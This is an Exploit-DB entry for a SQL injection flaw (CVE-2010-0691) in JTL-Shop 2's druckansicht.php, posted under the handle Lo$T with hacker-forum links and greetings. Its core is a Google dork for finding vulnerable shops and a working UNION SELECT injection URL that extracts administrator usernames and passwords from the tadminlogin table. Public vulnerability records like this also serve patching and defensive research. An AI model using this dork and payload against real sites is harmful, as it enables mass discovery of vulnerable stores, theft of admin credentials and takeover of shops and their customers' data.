JTL-Shop 2 druckansicht.php SQL Injection Vulnerability

ID EDB-ID:11445
Type exploitdb
Reporter Lo$T
Modified 2010-02-14T00:00:00


JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability. CVE-2010-0691. Webapps exploit for php platform

                                            JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability

author : Lo$T

(#) Home : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb><http://www.sa-hacker.com/vb> + www.sec-eviles.com/vb<http://www.sec-eviles.com/vb>

email : H_CK@live.fr<mailto:H_CK@live.fr>

Dork :" Powered by JTL-Shop 2"

exp :

http://server/Path/druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--
Greetz TO :beloved560 + The S3r!0uS + SMDo